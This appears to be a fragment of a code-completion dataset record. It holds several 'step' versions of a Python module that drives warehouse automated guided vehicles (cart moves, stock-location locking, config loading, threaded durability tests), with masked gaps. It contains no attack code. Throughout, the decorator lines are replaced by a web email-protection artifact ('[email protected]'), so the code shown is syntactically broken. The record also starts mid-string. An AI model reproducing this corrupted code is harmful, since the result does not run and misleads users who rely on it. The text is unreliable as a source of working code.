json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\n<mask token>\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\n<mask token>\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\n<mask token>\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\n<mask token>\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\n<mask token>\n\n\ndef testgetPoint():\n resulta = getPoint('StockA_row7_col4')\n assert resulta == 'begin_1'\n resultb = getPoint('StockA_row8_col4')\n assert resultb == 'begin_2'\n\n\ndef testgetOrginPoint():\n resulta = getOriginPoint('begin_1')\n assert resulta == 'StockA_row7_col4'\n resultb = getOriginPoint('begin_2')\n assert resultb == 'StockA_row8_col4'\n resultc = getOriginPoint('hhahahaa')\n assert resultc == 'hhahahaa'\n\n\ndef testgetStockA():\n assert getStockA('stockA_row10_col3') == 9003\n assert getStockA('stockA_row10_col4') == 9004\n assert getStockA('stockA_row1_col1') == 1001\n assert getStockA('stockA_row2_col2') == 1002\n assert getStockA('stockA_row3_col2') == 3002\n assert getStockA('stockA_row4_col2') == 3002\n assert getStockA('stockA_row4_col2.1') == 3002\n assert getStockA('stockB_row4_col2.1') == None\n assert getStockA('begin_1') == None\n assert getStockA('seat_1') == None\n\n\ndef testcheckCart():\n global g_carts\n g_carts = None\n checkCart('CART9001', '591')\n checkCart('CART9002', '592')\n gg = json_codec.load_file('cart.cfg')\n assert 'CART9001' in gg\n assert 'CART9002' in gg\n assert gg['CART9001'] == '591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\n<mask token>\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\n<mask token>\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\[email protected]()\ndef init():\n if utility.is_test():\n return\n api.init()\n time.sleep(3)\n\n\ndef wait():\n global g_threads\n for t in g_threads:\n t.join()\n g_threads.clear()\n\n\[email protected]()\ndef fini():\n if utility.is_test():\n return\n api.fini()\n wait()\n\n\n<mask token>\n\n\ndef getStockA(loc):\n if loc[0:6] != 'stockA':\n return None\n m = re.search('stockA_row(\\\\d+)_col(\\\\d+).*', loc)\n if m is None:\n return None\n row = int(m.group(1))\n col = int(m.group(2))\n if row is None:\n return\n if row % 2 != 1:\n row -= 1\n return row * 1000 + col\n\n\[email protected](g_lock)\ndef checkTimeout(index, agvId, loc):\n global g_stockLock\n if index in g_stockLock:\n if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:\n unlockStockA(agvId, loc)\n log.warning('delete timeout locked', index)\n\n\ndef lockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index is None:\n return\n if index in g_stockLock:\n checkTimeout(index, agvId, loc)\n log.warning(agvId, loc, 'is locked, wait for unlock')\n for i in range(60 * 5):\n if index not in g_stockLock:\n break\n time.sleep(1)\n log.info(agvId, loc, 'wait for unlock success')\n global g_lock\n log.debug(agvId, 'lock', loc, index)\n g_lock.acquire()\n g_stockLock[index] = utility.ticks()\n g_lock.release()\n\n\[email protected](g_lock)\ndef unlockStockA(agvId, loc):\n global g_stockLock\n index = getStockA(loc)\n if index in g_stockLock:\n log.debug(agvId, 'unlock', loc, index)\n del g_stockLock[index]\n\n\[email protected](g_lock)\ndef getPoint(originPoint):\n global g_point\n loadPoint()\n if g_point[originPoint] is not None:\n return g_point[originPoint]\n return originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n global g_point\n loadPoint()\n for itemIndex in g_point:\n if g_point[itemIndex] == point:\n return itemIndex\n return point\n\n\[email protected](g_lock)\ndef loadPoint():\n global g_point\n filePath = os.path.dirname(__file__)\n fileName = 'point.cfg'\n if filePath:\n fileName = filePath + '/' + fileName\n g_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\ndef checkCart(cartId, scanId):\n scanId = scanId.strip()\n\n def loadCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n g_carts = json_codec.load_file(pp)\n\n def saveCart():\n global g_carts\n p = os.path.dirname(__file__)\n pp = 'cart.cfg'\n if p:\n pp = p + '/' + pp\n json_codec.dump_file(pp, g_carts)\n\n def findCart(scanId):\n global g_carts\n for c in g_carts:\n if g_carts[c] == scanId:\n return c\n return 'unknown'\n global g_carts\n if g_carts is None:\n loadCart()\n if cartId in g_carts:\n if scanId != g_carts[cartId]:\n log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))\n raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart\n (scanId))\n else:\n g_carts[cartId] = scanId\n saveCart()\n\n\ndef _run(func, args, callback, obj):\n\n def threadFunc(func, args, callback, obj):\n hasCallback = False\n try:\n func(*args)\n if utility.is_exited():\n return\n hasCallback = True\n callback(obj)\n except Exception as e:\n obj['result'] = -1\n obj['resultDesc'] = str(e)\n log.exception('agvCtrl:', e)\n if 'agv' in obj:\n agvId = obj['agv']\n log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')\n restAgv(agvId)\n freeAgv(agvId)\n if not hasCallback:\n callback(obj)\n t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))\n global g_threads\n t.start()\n g_threads.append(t)\n\n\ndef _initObj(obj, agvId):\n obj['agv'] = agvId\n obj['result'] = 0\n obj['resultDesc'] = 'success'\n\n\ndef _call(agvId, locId):\n if api.isCartLoc(locId):\n api.move(agvId, locId + '.1')\n lockStockA(agvId, locId)\n try:\n api.mission(agvId, 1)\n except Exception as e:\n unlockStockA(agvId, locId)\n raise e\n else:\n api.move(agvId, locId)\n\n\ndef apply(locId):\n locId = getOriginPoint(locId)\n return api.apply(locId + '.1')\n\n\ndef call(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n locId = getOriginPoint(locId)\n try:\n _run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n return agvId\n\n\ndef _moveCart(agvId, srcLoc, locId, cartId):\n try:\n c = api.mission(agvId, 2)\n if c:\n checkCart(cartId, c)\n api.move(agvId, srcLoc + '.2')\n except Exception as e:\n pass\n finally:\n unlockStockA(agvId, srcLoc)\n loc, type = api.getMissionType('get', '', srcLoc)\n api.mission(agvId, type)\n loc, type = api.getMissionType('put', srcLoc, locId)\n api.move(agvId, loc + '.3')\n api.mission(agvId, type)\n lockStockA(agvId, locId)\n try:\n api.move(agvId, locId + '.4')\n api.mission(agvId, 5)\n api.move(agvId, locId + '.5')\n finally:\n unlockStockA(agvId, locId)\n freeAgv(agvId)\n\n\ndef moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):\n _initObj(obj, agvId)\n assert api.isCartLoc(cartId)\n srcLoc = getOriginPoint(srcLoc)\n locId = getOriginPoint(locId)\n try:\n _run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=\n finishCallback, obj=obj)\n except Exception as e:\n restAgv(agvId)\n freeAgv(agvId)\n raise e\n\n\ndef move(agvId, locId, finishCallback, obj):\n _initObj(obj, agvId)\n try:\n locId = getOriginPoint(locId)\n _run(func=api.move, args=(agvId, locId), callback=finishCallback,\n obj=obj)\n except Exception as e:\n freeAgv(agvId)\n raise e\n\n\ndef freeAgv(agvId):\n try:\n api.unlock(agvId)\n except Exception as e:\n log.exception('freeAgv', e)\n\n\ndef restAgv(agvId):\n agvId2 = api.getAgvId(agvId)\n api.reset(agvId2)\n\n\ndef Init():\n import interface.dashboard.dashboardApi\n locationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n 